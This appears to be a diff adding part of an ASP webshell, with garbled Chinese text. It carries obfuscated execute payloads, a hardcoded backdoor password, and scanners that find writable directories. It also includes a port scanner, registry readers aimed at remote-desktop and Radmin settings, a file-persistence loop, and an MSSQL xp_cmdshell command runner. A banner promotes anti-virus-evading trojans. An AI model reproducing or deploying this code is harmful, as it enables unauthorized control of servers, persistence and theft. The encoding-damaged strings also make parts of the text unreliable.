+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+Dim FSO,OFolder,TempFolder,Scmsg,S
+Set FSO = Server.Createobject(CONST_FSO)
+folder = folderArr(i)
+If FSO.FolderExists(folder) Then
+ Set OFolder = FSO.GetFolder(folder)
+Set TempFolders = OFolder.SubFolders
+Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+For Each S in TempFolders
+ Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+Next
+Set TempFolders = Nothing
+Set OFolder = Nothing
+Else
+ Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+End if
+Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+Set FSO = Nothing
+Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+Sub CustomScanDriveForm()
+execute(king("yo rft��`>``;)0-(gu.nkgzloi``=aeosZfg ��ҳ���ϻط�=txsqc fgzzxw=thnz JMYGC<` p��`>kw<]������ɨ[` p��zbtG�� yC rfS��koWzbtGaetiZ,tsoXaetiZ,))o(zoshUlizqY(dokJ tsoX_koW_tzokKkoWvgiU��ftiz 1>)`:`,)o(zoshUlizqY(kzlfo yo�� )zoshUlizqY(rfxgAM gJ )zoshUlizqY(rfxgAV=o kgX�� ))10(kie&)80(kie,)`lizqY`(zltxjtN(zoshU=zoshUlizqY��)`lizqY`(zltxjtN = )`lizqh`(fgolltU��ilxsX.tlfghltk��`>kw<......�������ʱ�Ķ�һҪ���ܿɲ��` p��)`fg`=)`hdtJaetiZgG`(zltxjtN( = hdtJaetiZgG��)`fg`=)`tzokKgGvgiU`(zltxjtN( = koWtzokKgGvgiU��)`fg`=)`koWzbtGaetiZ`(zltxjtN( = koWzbtGaetiZ��)`fg`=)`tsoXaetiZ`(zltxjtN( = tsoXaetiZ��tlst��`>ktzfte/<>dkgy/<` p��`>stwqs/<¼Ŀʱ�ٲ�첻` p��`>/ 'rtaetie'=rtaetie 'hdtJaetiZgG'=ro 'bgwaetie'=thnz 'hdtJaetiZgG'=tdqf zxhfo<` p��`>'hdtJaetiZgG'=kgy stwqs<` p��`>stwqs/<���ĺ�¼Ŀд����` p��`>/'tzokKgGvgiU'=ro 'bgwaetie'=thnz 'tzokKgGvgiU'=tdqf zxhfo<` p��`>'tzokKgGvgiU'=kgy stwqs<` p��`>stwqs/<` p��`�����Բ�>/  'rtaetie'=rtaetie 'tsoXaetiZ'=ro 'bgwaetie'=thnz 'tsoXaetiZ'=tdqf zxhfo<` p��`>'tsoXaetiZ'=kgy stwqs<` p��`>stwqs/<` p��`  ¼Ŀ�Բ�>/ 'rtaetie'=rtaetie 'koWzbtGaetiZ'=ro 'bgwaetie'=thnz 'koWzbtGaetiZ'=tdqf zxhfo<` p��`>'koWzbtGaetiZ'=kgy stwqs<` p��`> '���ʼ��'=txsqc 'fgzzxw'=tdqf 'zodwxl'=thnz zxhfo<` p��`>/ kw<` p��`>qtkqzbtz/<`&kzl_lizqY&`>'zorS'=llqse '10'=lvgk '13'=lsge 'lizqY'=tdqf qtkqzbtz<` p��`>kw<¼Ŀ�Ӳ�춯�Ի����,¼Ŀ�IJ����������>kw<!Ϣ�Ź���ȫ��Щһ�����������Ϊ,����д��¼Ŀ������������Կ���̴�` p��`>''=fgozeq 'zlgh'=rgiztd '0dkgy'=tdqf '0dkgy'=ro dkgy<>ktzfte<` p��)`lizqh`(fgolltU=kzl_lizqY  ftiz ``><)`lizqh`(fgolltU yo��`wxhztfC\:Z`&)10(kie&)80(kie&`tkxzhqZESYR\:Z`&)10(kie&)80(kie&`tieqe\:Z`&)10(kie&)80(kie&`etk158\:Z`&)10(kie&)80(kie&`\foqdzlgittky\:r`&)10(kie&)80(kie&`\wxhdv\:Z`&)10(kie&)80(kie&`\ktsenetk\:y`&)10(kie&)80(kie&`\ktsenetk\:t`&)10(kie&)80(kie&`\ktsenetk\:r`&)10(kie&)80(kie&`\ktsenetk\:Z`&)10(kie&)80(kie&`\ltsoX dqkugkY\:t`&)10(kie&)80(kie&`\ltsoX dqkugkY\:r`&)10(kie&)80(kie&`\hih\:e`&)10(kie&)80(kie&`\ltsoX dqkugkY\:e`&)10(kie&)80(kie&`\lufozztU rfq lzftdxegW\:e`&)10(kie&)80(kie&`\lvgrfov\:e`=kzl_lizqY��ftiz ``= )`lizqY`(zltxjtN yo��SxkJ = ktyyxA.tlfghltN'"))
+end sub
+function GetFullPath(path)
+GetFullPath = path
+if Right(path,1) <> "\" then GetFullPath = path&"\" 
+end function
+Function Deltextfile(filepath)
+On Error Resume Next
+Set objFSO = CreateObject(CONST_FSO) 
+if objFSO.FileExists(filepath) then 
+objFSO.DeleteFile(filepath) 
+end if 
+Set objFSO = nothing
+Deltextfile = Err.Number 
+End Function 
+Function CheckDirIsOKWrite(DirStr)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+filepath = GetFullPath(DirStr)&fso.GettempName
+FSO.CreateTextFile(filepath) 
+CheckDirIsOKWrite = Err.Number
+if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+j "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+set fout =Nothing
+set FSO = Nothing
+Deltextfile(filepath)
+if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+function CheckFileWrite(filepath)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+set getAtt=FSO.GetFile(filepath)
+getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+set FSO = Nothing
+set getAtt = Nothing  
+end function
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+B = FSO.FolderExists(Path)
+set FSO=nothing
+IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+if B=false then
+Re = CheckFileWrite(Path)
+if Re =0 then
+j "[�ļ�]<font color=red>"&Path&"</font><br>"
+b =true
+exit function
+else
+j "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
+exit function
+end if
+end if
+Path = GetFullPath(Path)
+re = CheckDirIsOKWrite(Path)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+end if
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+for each file in f.Files
+Re = CheckFileWrite(Path&file.name)
+if Re =0 then
+j "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+b =true
+else
+if ShowNoWriteDir then j "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+next
+if b then response.Flush 
+end if
+for each file in f.SubFolders
+if CheckNextDir=false then
+re = CheckDirIsOKWrite(Path&file.name)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+end if
+end if
+if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 
+ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 
+end if
+next
+Set FSO = Nothing
+set f = Nothing
+end function
+c=userpass
+function goback()
+execute(king("ufoizgf=ktrsgyg ztl��ufoizgf=glyB ztl��yo rft��`>ktzfte/<>kw/<>';)0-(gu.nkgzloi'=aeosZfg �ط�=txsqc fgzzxw=thnz JMYGC<>kw<>ktzfte<>ktzfte/<!��¼Ŀ���̴��Ǿ���>ktzfte<>zhokel/<)```&)`izqYktrsgX`(fgolltU&```(ktrsgXvgiU>zhokel<` p�� tlst��`>zhokel/<)```&)ktrsgyzftkqh.ktrsgyg(izqYtN&```(ktrsgXvgiU>zhokel<` p�� ftiz ktrsgXzggNlC.ktrsgyg zgf yo��))`izqYktrsgX`(fgolltU(ktrsgyztE.glyB = ktrsgyg ztl��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = glyB ztl"))
+end function
+sub ReadREG()
+execute(king("yo rft��yC rfS��nqkkQtiz & `>os<` p��tlsS��zbtG��)o(nqkkQtiz & `>os<` p��)nqkkQtiz(rfxgAM gJ 1=o kgX��ftiJ )nqkkQtiz(nqkkQlC yC��)izqYtiz(rqtNutN.Llv=nqkkQtiz��)`izqYtiz`(zltxjtN=izqYtiz��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��zbtG tdxltN kgkkS fB��ftiz ``><)`izqYtiz`(zltxjtN yo��`>/ki<>dkgy/<` p��`>')(zodwxl.dkgy.loiz'=aeosefg 'ֵ �� ��'=txsqc fgzzxw=thnz zxhfo<` p��`>13=tmol ''=txsqc izqYtiz=tdqf zxhfo< ` p��`>/ kw<>zetstl/<` p��`>fgozhg/<�ڶ�YZJ�ķſ�����>'lzkgYrtvgssQYZJ\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�YWM�ķſ�����>'lzkgYrtvgssQYWM\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ſ����>'YZJ:2388\zloV\lzkgYfthBnssqwgsE\tsoygkYrkqrfqzU\neosgYssqvtkoX\lktztdqkqY\llteeQrtkqiU\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ugV tsxrtieU>'izqYugV\zftuQufosxrtieU\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<8�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<9�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\911ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<0�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�̬״KnfQeY>``zkgYlxzqzUYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ˾���KnfQeY>``zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�2388>``ktwdxGzkgY\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�7ZGI>``ktwdxGzkgY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����7ZGI>``rkgvllqY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�8ZGI>``ktwdxGzkgY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<����8ZGI>``rkgvllqY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�fodrqN>``zkgY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����fodrqN>``ktztdqkqY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<���п���>``rfoA\tuqafoV\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<tdqGktzxhdgZ>'tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ֵ���Ĵ�����ѡ>''=txsqc fgozhg<` p��`>';txsqc.loiz=txsqc.izqYtiz.dkgy.loiz'=tufqiZfg zetstl<` p��` >9=fqhlsge rz<>kz<` p��`>zeQtiz=tdqf utNrqtN=txsqc ftrroi=thnz zxhfo<` p�� `>h<ȡ��ֵ������ע`  p��`>zlgh=rgiztd dkgy<` p"))
+end sub
+sub delpoint()
+execute(king("`>cor/<>dkgy/<>'���ĵ����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'hlq.tsoy\..zgr\zlgittky\:W'= txsqc'63'=tmol  'zbtz'=thnz'tsoyhstr'=tdqf zxhfo<>'zlgh'=rgiztd ''=fgozeq dkgy<>h<>dkgy/<>'¼Ŀ�����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'..zgr\zlgittky\:W'=txsqc '63'=tmol 'zbtz'=thnz 'ktrgsyhstr'=tdqf zxhfo<>'zlgh'=rgiztd''=fgozeq dkgy<>kw<>kw<` p��`>zfgy<д����ʾ�ղ�>rtk= kgsge zfgy<` p��yo rft��)`tsoyhstr`(zltxjtN&`\?\\` tsoyzfoghstr��ftiz ``>< )`tsoyhstr`(zltxjtN yo��yo rft��)`ktrgsyhstr`(zltxjtN&`\?\\` ktrsgyzfoghstr��ftiz ``>< )`ktrgsyhstr`(zltxjtN yo"))
+end  sub
+function Delpointfolder(t0)
+execute(king("kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC��`>kw<!!���ɳ�ɾ`&1z  p     ��   txkz,1y ktrsgXtztstW.gly�� ftiJ )1y(lzlobSktrsgX.gly XC'��yC rfS��)1z(izqYhqT.ktcktU=1y  ��tlsS��1z=1y  ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU"))
+End Function
+function Delpointfile(t0)
+execute(king("`>kw<!!���ɳ�ɾ`&1z  p��kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC �� txkz,1y tsoXtztstW.gly ��yC rfS ��)1z(izqYhqT.ktcktU=1y  ��tlsS ��1z=1y ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU ��zbtG tdxltN kgkkS fB'"))
+End function
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject(CONST_FSO)
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+if request("profile")="a" then j c
+response.end
+end if
+
+if session("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("KKK")=UserPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>��Ҫ������ɱasp��php������ ���ǵ���վ�ǣ�www.mumasec.tk </font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+si="<body style=""background:url("&bg&") no-repeat center center;""> <center><FONT style=""FONT-SIZE: 80pt; FILTER: shadow(color:#696969,strength=55); WIDTH: 100%;  LINE-HEIGHT: 300%; FONT-FAMILY:Arial"">"&Copyright&"</FONT "&userpass&"><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><b>�������룺</b><input name='pass' type='password' size='22'> <input type='submit' value='����Ȩ��ǰ��'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="1433,3306,3389,4899,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+j"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD��CMD������ɨ�費׼ȷ��)</p><p>�������������ɨ�����ⲿIP�����޷����ӡ�����SHELL��ִ��ϵ�в�����</p>"
+j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+j"<p>Scan IP: "
+j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+j"<br>Port List:"
+j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+j"<br><br>"
+j"<input name='submit' type='submit' class='buttom' value=' scan '>"
+j"<input name='scan' type='hidden' id='scan' value='111'>"
+j"</p></form>"
+If request.Form("scan") <> "" Then
+timer1 = timer
+j("<b>ɨ�豨��:</b><br><hr>")
+tmp = Split(request.Form("port"),",")
+ip = Split(request.Form("ip"),",")
+For hu = 0 to Ubound(ip)
+If InStr(ip(hu),"-") = 0 Then
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ip(hu), tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ip(hu), j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Else
+ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
+For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ipStart & xxx, tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ipStart & xxx,j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Next
+End If
+Next
+timer2 = timer
+thetime=cstr(int(timer2-timer1))
+j"<hr>Process in "&thetime&" s"
+END IF
+end sub
+Sub Scan(targetip, portNum)
+On Error Resume Next
+set conn = Server.CreateObject("ADODB.connection")
+connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+conn.ConnectionTimeout = 1
+conn.open connstr
+If Err Then
+If Err.number = -2147217843 or Err.number = -2147467259 Then
+If InStr(Err.description, "(Connect()).") > 0 Then
+j(targetip & ":" & portNum & ".........�ر�<br>")
+Else
+j(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+End If
+End If
+End If
+End Sub
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+execute(king("`>kz/<>rz/<`&)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<���������ASK>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UB`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<ͳϵ���������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UNBUUSZBNY_XB_NSATMG`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<����MYZ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/< `&vgf&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<��ʱ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>dkgy/<>kz/<>rz/<>'9'=txsqc 'fgozeq'=tdqf 'ftrroi'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'_______________'=txsqc 'zodwxl'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'`&)`NWWQ_VQZBV`(ltswqokqIktcktU.zltxjtN&`'=txsqc '60'=tmol 'ho'=tdqf 'zbtz'=thnz zxhfo<>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<YC�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>'afqsw_'=ztukqz 'dkgyho'=tdqf 'hlq.ho/tktiv/wtv/ukg.sstilwtv//:hzzi'=fgozeq zlgh=rgiztd dkgy<>kz/<>rz/<`&)`STQG_NSINSU`(ltswqokqIktcktl.zltxjtk&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<�������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<Ϣ�ż��������>'xftd'=kgsgeuw 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti 